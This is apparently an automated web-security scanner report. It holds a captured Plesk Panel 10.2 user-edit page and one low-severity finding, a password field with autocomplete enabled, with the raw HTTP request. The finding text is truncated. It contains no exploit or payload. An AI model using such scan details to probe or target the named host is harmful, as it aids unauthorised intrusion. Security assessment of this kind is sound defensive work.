<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>format-1 - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/user/action-name/edit" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fuser%2Fedit%2Fid%2F3' + '&activeModule=' + 'users' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"active","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/user/list">
<span>Up Level</span>
</a>
</div>
<h2><span><b>format-1</b></span></h2>
</div>
</div>


<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Smb.UserEditForm = Class.create({

initialize: function(config) {

if (!$('general-account-loginString')) {
return;
}

if ($('general-vcard-email-emailType-internal')) {
$('general-vcard-email-emailType-internal').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-internalEmail')) {
$('general-vcard-email-internalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-internalEmail').observe('change', this._generateLogin.bind(this));
}
if ($('general-vcard-email-domain')) {
$('general-vcard-email-domain').observe('change', this._generateLogin.bind(this));
}

if ($('general-vcard-email-emailType-external')) {
$('general-vcard-email-emailType-external').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-externalEmail')) {
$('general-vcard-email-externalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-externalEmail').observe('change', this._generateLogin.bind(this));
}
},

_generateLogin: function() {
if ($('general-vcard-email-emailType-internal') && $('general-vcard-email-emailType-internal').checked) {
var loginString = $('general-vcard-email-internalEmail').value;
if ('' == loginString) {
//empty username
} else
if ($('general-vcard-email-domain')) {
loginString += '@' + $('general-vcard-email-domain').options[$('general-vcard-email-domain').selectedIndex].text;
} else {
loginString += '@' + $('general-vcard-email-internalEmail-domain').innerHTML;
}
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-emailType-external') && $('general-vcard-email-emailType-external').checked) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-externalEmail')) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
}
}
});

Jsw.onReady(function() {
new Smb.UserEditForm();
});
//]]>
</script><form id="form-user" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='form-tab-buttons' class='tabs'></div><script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.bar.Tabs({
type: 'dynamic',
applyTo: 'form-tab-buttons',
items: [{"componentType":"Jsw.bar.Button","title":"General","tabId":"tab-general","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Contact Details","tabId":"tab-contacts","containerCls":""}]
});
});
</script>

<div id='tab-general' >

<div id='general-vcard' class='form-box' >
<div id='general-vcard-content-area'>
<div id='general-vcard-contactName-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-contactName'>Contact name&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="general[vcard][contactName]" id="general-vcard-contactName" value="format-1" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div class="form-row">
<div class='field-name'>
<label for='general-vcard-email-emailType'>E-mail address which is also used as a username for logging in to the Panel&nbsp;</label> <span class="required">*</span>
</div>
<div class="field-value">
<div class="text-value">
<div class="indent-box">

<span><input type="radio" class="radio"
value="internal"
id="general-vcard-email-emailType-internal"
name="general[vcard][email][emailType]"
checked="checked" /></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-internal">Create an e-mail address under your account</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][internalEmail]" id="general-vcard-email-internalEmail" value="format-1" class="input-text" /> @<span id='general-vcard-email-internalEmail-domain'>vulnerable.host.fqdn</span></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
<div class="indent-box">

<span><input type="radio" class="radio"
value="external"
id="general-vcard-email-emailType-external"
name="general[vcard][email][emailType]"
/></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-external">Use an external e-mail address</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][externalEmail]" id="general-vcard-email-externalEmail" value="format-1@vulnerable.host.fqdn" class="f-middle-size input-text" disabled="1" /></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Smb.UserEmailForm = Class.create({

initialize: function(config) {
this._prefix = config['prefix'];
this._internalEmailId = this._prefix + config['internalEmailId'];
this._internalEmailElements = config['internalEmailElements'];
this._externalEmailId = this._prefix + config['externalEmailId'];
this._externalEmailElements = config['externalEmailElements'];
$(this._internalEmailId).observe('click', this._internalEmailOnClick.bind(this));
$(this._externalEmailId).observe('click', this._externalEmailOnClick.bind(this));
if ($(this._internalEmailId).checked) {
this._internalEmailOnClick();
} else {
   this._externalEmailOnClick();
}
},

_internalEmailOnClick: function() {
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
},

_externalEmailOnClick: function() {
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
}
});

Jsw.onReady(function() {
new Smb.UserEmailForm({
prefix: 'general-vcard-email-',
internalEmailId: 'emailType-internal',
internalEmailElements: ['internalEmail'
],
externalEmailId: 'emailType-external',
externalEmailElements: ['externalEmail']
});

});
//]]>
</script>


<div id='general-vcard-roleId-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-roleId'>User role&nbsp;</label></div>
<div class='field-value'>

<select name="general[vcard][roleId]" id="general-vcard-roleId">
<option value="5" label="Owner">Owner</option>
<option value="6" label="WebMaster">WebMaster</option>
<option value="7" label="Application User" selected="selected">Application User</option>
<option value="8" label="Accountant">Accountant</option>
</select>
<span class='field-errors' style="display:none;"></span>
<span class="hint">User roles grant users administrative privileges and access to applications that you selected for the role.</span>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'General Information',
applyTo: 'general-vcard'
});
});
//]]>
</script>


<div id='general-account' class='form-box' >
<div id='general-account-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-account-loginString'>Username&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-account-loginString'>format-1@vulnerable.host.fqdn</span>

</div>
</div>
</div>
<div id='general-account-password-form-row' class='form-row' >
<div class='field-name'><label for='general-account-password'>Password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][password]" id="general-account-password" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-account-password');
new Jsw.PasswordMeter({
renderTo: 'general-account-password',
renderMode: 'after',
observe: 'general-account-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-account-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-account-passwordConfirmation'>Confirm password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][passwordConfirmation]" id="general-account-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>

<div class='form-row'>
<div class='single-row'>
<div class='indent-box'>

<input type="hidden" name="general[account][isActive]" value="0" /><input type="checkbox" name="general[account][isActive]" id="general-account-isActive" value="1" checked="checked" class="checkbox" />
<div class='indent-box-content'>
<label for='general-account-isActive'>User is active&nbsp;</label>
<span class="hint">Active users can access the Panel.</span>
</div>
</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'Panel Preferences',
applyTo: 'general-account'
});
});
//]]>
</script>
</div>
<div id='tab-contacts' style="display: none;">

<div id='contacts-contactsSection' class='form-box' >
<div id='contacts-contactsSection-content-area'>
<div id='contacts-contactsSection-companyName-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-companyName'>Company name&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][companyName]" id="contacts-contactsSection-companyName" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-phone-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-phone'>Phone number&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][phone]" id="contacts-contactsSection-phone" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-fax-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-fax'>Fax number&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][fax]" id="contacts-contactsSection-fax" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-address-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-address'>Address&nbsp;</label></div>
<div class='field-value'>

<textarea name="contacts[contactsSection][address]" id="contacts-contactsSection-address" class="f-middle-size" rows="4" cols="80"></textarea>
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-city-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-city'>City&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][city]" id="contacts-contactsSection-city" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-state-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-state'>State or province&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][state]" id="contacts-contactsSection-state" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-zip-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-zip'>Postal or ZIP code&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][zip]" id="contacts-contactsSection-zip" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-country-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-country'>Country&nbsp;</label></div>
<div class='field-value'>

<select name="contacts[contactsSection][country]" id="contacts-contactsSection-country">
<option value="AF" label="Afghanistan">Afghanistan</option>
<option value="AX" label="..land Islands">..land Islands</option>
<option value="AL" label="Albania">Albania</option>
<option value="DZ" label="Algeria">Algeria</option>
<option value="AS" label="American Samoa">American Samoa</option>
<option value="AD" label="Andorra">Andorra</option>
<option value="AO" label="Angola">Angola</option>
<option value="AI" label="Anguilla">Anguilla</option>
<option value="AQ" label="Antarctica">Antarctica</option>
<option value="AG" label="Antigua and Barbuda">Antigua and Barbuda</option>
<option value="AR" label="Argentina">Argentina</option>
<option value="AM" label="Armenia">Armenia</option>
<option value="AW" label="Aruba">Aruba</option>
<option value="AU" label="Australia">Australia</option>
<option value="AT" label="Austria">Austria</option>
<option value="AZ" label="Azerbaijan">Azerbaijan</option>
<option value="BS" label="Bahamas">Bahamas</option>
<option value="BH" label="Bahrain">Bahrain</option>
<option value="BD" label="Bangladesh">Bangladesh</option>
<option value="BB" label="Barbados">Barbados</option>
<option value="BY" label="Belarus">Belarus</option>
<option value="BE" label="Belgium">Belgium</option>
<option value="BZ" label="Belize">Belize</option>
<option value="BJ" label="Benin">Benin</option>
<option value="BM" label="Bermuda">Bermuda</option>
<option value="BT" label="Bhutan">Bhutan</option>
<option value="BO" label="Bolivia, Plurinational State of">Bolivia, Plurinational State of</option>
<option value="BA" label="Bosnia and Herzegovina">Bosnia and Herzegovina</option>
<option value="BW" label="Botswana">Botswana</option>
<option value="BV" label="Bouvet Island">Bouvet Island</option>
<option value="BR" label="Brazil">Brazil</option>
<option value="IO" label="British Indian Ocean Territory">British Indian Ocean Territory</option>
<option value="BN" label="Brunei Darussalam">Brunei Darussalam</option>
<option value="BG" label="Bulgaria">Bulgaria</option>
<option value="BF" label="Burkina Faso">Burkina Faso</option>
<option value="BI" label="Burundi">Burundi</option>
<option value="KH" label="Cambodia">Cambodia</option>
<option value="CM" label="Cameroon">Cameroon</option>
<option value="CA" label="Canada">Canada</option>
<option value="CV" label="Cape Verde">Cape Verde</option>
<option value="KY" label="Cayman Islands">Cayman Islands</option>
<option value="CF" label="Central African Republic">Central African Republic</option>
<option value="TD" label="Chad">Chad</option>
<option value="CL" label="Chile">Chile</option>
<option value="CN" label="China">China</option>
<option value="CX" label="Christmas Island">Christmas Island</option>
<option value="CC" label="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option>
<option value="CO" label="Colombia">Colombia</option>
<option value="KM" label="Comoros">Comoros</option>
<option value="CG" label="Congo">Congo</option>
<option value="CD" label="Congo, the Democratic Republic of the">Congo, the Democratic Republic of the</option>
<option value="CK" label="Cook Islands">Cook Islands</option>
<option value="CR" label="Costa Rica">Costa Rica</option>
<option value="CI" label="Cote D'Ivoire">Cote D'Ivoire</option>
<option value="HR" label="Croatia">Croatia</option>
<option value="CU" label="Cuba">Cuba</option>
<option value="CY" label="Cyprus">Cyprus</option>
<option value="CZ" label="Czech Republic">Czech Republic</option>
<option value="DK" label="Denmark">Denmark</option>
<option value="DJ" label="Djibouti">Djibouti</option>
<option value="DM" label="Dominica">Dominica</option>
<option value="DO" label="Dominican Republic">Dominican Republic</option>
<option value="EC" label="Ecuador">Ecuador</option>
<option value="EG" label="Egypt">Egypt</option>
<option value="SV" label="El Salvador">El Salvador</option>
<option value="GQ" label="Equatorial Guinea">Equatorial Guinea</option>
<option value="ER" label="Eritrea">Eritrea</option>
<option value="EE" label="Estonia">Estonia</option>
<option value="ET" label="Ethiopia">Ethiopia</option>
<option value="FK" label="Falkland Islands (Malvinas)">Falkland Islands (Malvinas)</option>
<option value="FO" label="Faroe Islands">Faroe Islands</option>
<option value="FJ" label="Fiji">Fiji</option>
<option value="FI" label="Finland">Finland</option>
<option value="FR" label="France">France</option>
<option value="GF" label="French Guiana">French Guiana</option>
<option value="PF" label="French Polynesia">French Polynesia</option>
<option value="TF" label="French Southern Territories">French Southern Territories</option>
<option value="GA" label="Gabon">Gabon</option>
<option value="GM" label="Gambia">Gambia</option>
<option value="GE" label="Georgia">Georgia</option>
<option value="DE" label="Germany">Germany</option>
<option value="GH" label="Ghana">Ghana</option>
<option value="GI" label="Gibraltar">Gibraltar</option>
<option value="GR" label="Greece">Greece</option>
<option value="GL" label="Greenland">Greenland</option>
<option value="GD" label="Grenada">Grenada</option>
<option value="GP" label="Guadeloupe">Guadeloupe</option>
<option value="GU" label="Guam">Guam</option>
<option value="GT" label="Guatemala">Guatemala</option>
<option value="GG" label="Guernsey">Guernsey</option>
<option value="GN" label="Guinea">Guinea</option>
<option value="GW" label="Guinea-Bissau">Guinea-Bissau</option>
<option value="GY" label="Guyana">Guyana</option>
<option value="HT" label="Haiti">Haiti</option>
<option value="HM" label="Heard Island and McDonald Islands">Heard Island and McDonald Islands</option>
<option value="VA" label="Holy See (Vatican City State)">Holy See (Vatican City State)</option>
<option value="HN" label="Honduras">Honduras</option>
<option value="HK" label="Hong Kong">Hong Kong</option>
<option value="HU" label="Hungary">Hungary</option>
<option value="IS" label="Iceland">Iceland</option>
<option value="IN" label="India">India</option>
<option value="ID" label="Indonesia">Indonesia</option>
<option value="IR" label="Iran, Islamic Republic of">Iran, Islamic Republic of</option>
<option value="IQ" label="Iraq">Iraq</option>
<option value="IE" label="Ireland">Ireland</option>
<option value="IM" label="Isle of Man">Isle of Man</option>
<option value="IL" label="Israel">Israel</option>
<option value="IT" label="Italy">Italy</option>
<option value="JM" label="Jamaica">Jamaica</option>
<option value="JP" label="Japan">Japan</option>
<option value="JE" label="Jersey">Jersey</option>
<option value="JO" label="Jordan">Jordan</option>
<option value="KZ" label="Kazakhstan">Kazakhstan</option>
<option value="KE" label="Kenya">Kenya</option>
<option value="KI" label="Kiribati">Kiribati</option>
<option value="KP" label="Korea, Democratic People's Republic of">Korea, Democratic People's Republic of</option>
<option value="KR" label="Korea, Republic of">Korea, Republic of</option>
<option value="KW" label="Kuwait">Kuwait</option>
<option value="KG" label="Kyrgyzstan">Kyrgyzstan</option>
<option value="LA" label="Lao People's Democratic Republic">Lao People's Democratic Republic</option>
<option value="LV" label="Latvia">Latvia</option>
<option value="LB" label="Lebanon">Lebanon</option>
<option value="LS" label="Lesotho">Lesotho</option>
<option value="LR" label="Liberia">Liberia</option>
<option value="LY" label="Libyan Arab Jamahiriya">Libyan Arab Jamahiriya</option>
<option value="LI" label="Liechtenstein">Liechtenstein</option>
<option value="LT" label="Lithuania">Lithuania</option>
<option value="LU" label="Luxembourg">Luxembourg</option>
<option value="MO" label="Macao">Macao</option>
<option value="MK" label="Macedonia, the Former Yugoslav Republic of">Macedonia, the Former Yugoslav Republic of</option>
<option value="MG" label="Madagascar">Madagascar</option>
<option value="MW" label="Malawi">Malawi</option>
<option value="MY" label="Malaysia">Malaysia</option>
<option value="MV" label="Maldives">Maldives</option>
<option value="ML" label="Mali">Mali</option>
<option value="MT" label="Malta">Malta</option>
<option value="MH" label="Marshall Islands">Marshall Islands</option>
<option value="MQ" label="Martinique">Martinique</option>
<option value="MR" label="Mauritania">Mauritania</option>
<option value="MU" label="Mauritius">Mauritius</option>
<option value="YT" label="Mayotte">Mayotte</option>
<option value="MX" label="Mexico">Mexico</option>
<option value="FM" label="Micronesia, Federated States of">Micronesia, Federated States of</option>
<option value="MD" label="Moldova, Republic of">Moldova, Republic of</option>
<option value="MC" label="Monaco">Monaco</option>
<option value="MN" label="Mongolia">Mongolia</option>
<option value="ME" label="Montenegro">Montenegro</option>
<option value="MS" label="Montserrat">Montserrat</option>
<option value="MA" label="Morocco">Morocco</option>
<option value="MZ" label="Mozambique">Mozambique</option>
<option value="MM" label="Myanmar">Myanmar</option>
<option value="NA" label="Namibia">Namibia</option>
<option value="NR" label="Nauru">Nauru</option>
<option value="NP" label="Nepal">Nepal</option>
<option value="NL" label="Netherlands">Netherlands</option>
<option value="AN" label="Netherlands Antilles">Netherlands Antilles</option>
<option value="NC" label="New Caledonia">New Caledonia</option>
<option value="NZ" label="New Zealand">New Zealand</option>
<option value="NI" label="Nicaragua">Nicaragua</option>
<option value="NE" label="Niger">Niger</option>
<option value="NG" label="Nigeria">Nigeria</option>
<option value="NU" label="Niue">Niue</option>
<option value="NF" label="Norfolk Island">Norfolk Island</option>
<option value="MP" label="Northern Mariana Islands">Northern Mariana Islands</option>
<option value="NO" label="Norway">Norway</option>
<option value="OM" label="Oman">Oman</option>
<option value="PK" label="Pakistan">Pakistan</option>
<option value="PW" label="Palau">Palau</option>
<option value="PS" label="Palestinian Territory, Occupied">Palestinian Territory, Occupied</option>
<option value="PA" label="Panama">Panama</option>
<option value="PG" label="Papua New Guinea">Papua New Guinea</option>
<option value="PY" label="Paraguay">Paraguay</option>
<option value="PE" label="Peru">Peru</option>
<option value="PH" label="Philippines">Philippines</option>
<option value="PN" label="Pitcairn">Pitcairn</option>
<option value="PL" label="Poland">Poland</option>
<option value="PT" label="Portugal">Portugal</option>
<option value="PR" label="Puerto Rico">Puerto Rico</option>
<option value="QA" label="Qatar">Qatar</option>
<option value="RE" label="Reunion">Reunion</option>
<option value="RO" label="Romania">Romania</option>
<option value="RU" label="Russian Federation">Russian Federation</option>
<option value="RW" label="Rwanda">Rwanda</option>
<option value="BL" label="Saint Barthelemy">Saint Barthelemy</option>
<option value="SH" label="Saint Helena, Ascension and Tristan da Cunha">Saint Helena, Ascension and Tristan da Cunha</option>
<option value="KN" label="Saint Kitts and Nevis">Saint Kitts and Nevis</option>
<option value="LC" label="Saint Lucia">Saint Lucia</option>
<option value="MF" label="Saint Martin">Saint Martin</option>
<option value="PM" label="Saint Pierre and Miquelon">Saint Pierre and Miquelon</option>
<option value="VC" label="Saint Vincent and the Grenadines">Saint Vincent and the Grenadines</option>
<option value="WS" label="Samoa">Samoa</option>
<option value="SM" label="San Marino">San Marino</option>
<option value="ST" label="Sao Tome and Principe">Sao Tome and Principe</option>
<option value="SA" label="Saudi Arabia">Saudi Arabia</option>
<option value="SN" label="Senegal">Senegal</option>
<option value="RS" label="Serbia">Serbia</option>
<option value="SC" label="Seychelles">Seychelles</option>
<option value="SL" label="Sierra Leone">Sierra Leone</option>
<option value="SG" label="Singapore">Singapore</option>
<option value="SK" label="Slovakia">Slovakia</option>
<option value="SI" label="Slovenia">Slovenia</option>
<option value="SB" label="Solomon Islands">Solomon Islands</option>
<option value="SO" label="Somalia">Somalia</option>
<option value="ZA" label="South Africa">South Africa</option>
<option value="GS" label="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option>
<option value="ES" label="Spain">Spain</option>
<option value="LK" label="Sri Lanka">Sri Lanka</option>
<option value="SD" label="Sudan">Sudan</option>
<option value="SR" label="Suriname">Suriname</option>
<option value="SJ" label="Svalbard and Jan Mayen">Svalbard and Jan Mayen</option>
<option value="SZ" label="Swaziland">Swaziland</option>
<option value="SE" label="Sweden">Sweden</option>
<option value="CH" label="Switzerland">Switzerland</option>
<option value="SY" label="Syrian Arab Republic">Syrian Arab Republic</option>
<option value="TW" label="Taiwan">Taiwan</option>
<option value="TJ" label="Tajikistan">Tajikistan</option>
<option value="TZ" label="Tanzania, United Republic of">Tanzania, United Republic of</option>
<option value="TH" label="Thailand">Thailand</option>
<option value="TL" label="Timor-Leste">Timor-Leste</option>
<option value="TG" label="Togo">Togo</option>
<option value="TK" label="Tokelau">Tokelau</option>
<option value="TO" label="Tonga">Tonga</option>
<option value="TT" label="Trinidad and Tobago">Trinidad and Tobago</option>
<option value="TN" label="Tunisia">Tunisia</option>
<option value="TR" label="Turkey">Turkey</option>
<option value="TM" label="Turkmenistan">Turkmenistan</option>
<option value="TC" label="Turks and Caicos Islands">Turks and Caicos Islands</option>
<option value="TV" label="Tuvalu">Tuvalu</option>
<option value="UG" label="Uganda">Uganda</option>
<option value="UA" label="Ukraine">Ukraine</option>
<option value="AE" label="United Arab Emirates">United Arab Emirates</option>
<option value="GB" label="United Kingdom">United Kingdom</option>
<option value="US" label="United States" selected="selected">United States</option>
<option value="UM" label="United States Minor Outlying Islands">United States Minor Outlying Islands</option>
<option value="UY" label="Uruguay">Uruguay</option>
<option value="UZ" label="Uzbekistan">Uzbekistan</option>
<option value="VU" label="Vanuatu">Vanuatu</option>
<option value="VE" label="Venezuela, Bolivarian Republic of">Venezuela, Bolivarian Republic of</option>
<option value="VN" label="Viet Nam">Viet Nam</option>
<option value="VG" label="Virgin Islands, British">Virgin Islands, British</option>
<option value="VI" label="Virgin Islands, U.S.">Virgin Islands, U.S.</option>
<option value="WF" label="Wallis and Futuna">Wallis and Futuna</option>
<option value="EH" label="Western Sahara">Western Sahara</option>
<option value="YE" label="Yemen">Yemen</option>
<option value="ZM" label="Zambia">Zambia</option>
<option value="ZW" label="Zimbabwe">Zimbabwe</option>
</select>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'contacts-contactsSection'
});
});
//]]>
</script>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/user/list"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="bdaafe67daaa200e2f077bd9577b09f4" id="form_forgery_protection_token" /></form>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.FormAjax({
applyTo: 'form-user',
waitButtonTitle: 'Please wait'
})
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

6.8. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/4  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/edit/id/4

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /smb/user/edit/id/4 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/user/list
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
